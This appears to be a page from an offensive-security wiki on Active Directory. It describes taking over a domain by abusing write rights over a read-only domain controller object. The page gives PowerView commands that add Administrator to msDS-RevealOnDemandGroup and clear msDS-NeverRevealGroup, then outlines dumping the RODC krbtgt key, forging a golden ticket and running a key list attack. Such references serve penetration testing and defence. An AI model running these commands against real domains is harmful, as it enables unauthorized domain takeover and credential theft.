With administrative control over the RODC computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s msDS-NeverRevealGroup
and msDS-RevealOnDemandGroup
attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.
{% hint style="info" %}
For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow WriteProperty
against the msDS-RevealOnDemandGroup
and msDS-NeverRevealGroup
attributes:
GenericWrite
GenericAll
/FullControl
WriteDacl
(the attacker can modify the DACL and obtain arbitrary permissions)Owns
(c.f.WriteDacl
)WriteOwner
(i.e. the attacker can obtainOwns
->WriteDacl
-> other permissions)WriteProperty
against themsDS-RevealOnDemandGroup
attribute in conjunction with another primitive to gain privileged access to the host.WriteProperty
against themsDS-NeverRevealGroup
attribute may be required if it includes the target account. {% endhint %}
{% tabs %} {% tab title="UNIX-like" %} From UNIX-like systems, this PowerView python package (Python) can be used to modify the LDAP attribute.
powerview "$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"
#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
#Then, append the Allowed RODC Password Replication Group group
PV > Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
PV > Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'
#If needed, remove the admin from the msDS-NeverRevealGroup attribute
PV > Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup
Then, dump the krbtgt_XXXXX
key on the RODC server with admin access on the host (this can be done by modifying the managedBy
attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.
{% endtab %}
{% tab title="Windows" %} From Windows systems, PowerView (PowerShell) can be used for this purpose.
#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}
#If needed, remove the admin from the msDS-NeverRevealGroup attribute
Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'
Then, dump the krbtgt_XXXXX
key on the RODC server with admin access on the host (this can be done by modifying the managedBy
attribute for example), and use it to forge a RODC golden ticket and conduct a key list attack to retrieve the domain Administrator's password hash.
{% endtab %}
{% endtabs %}
{% embed url="https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06" %}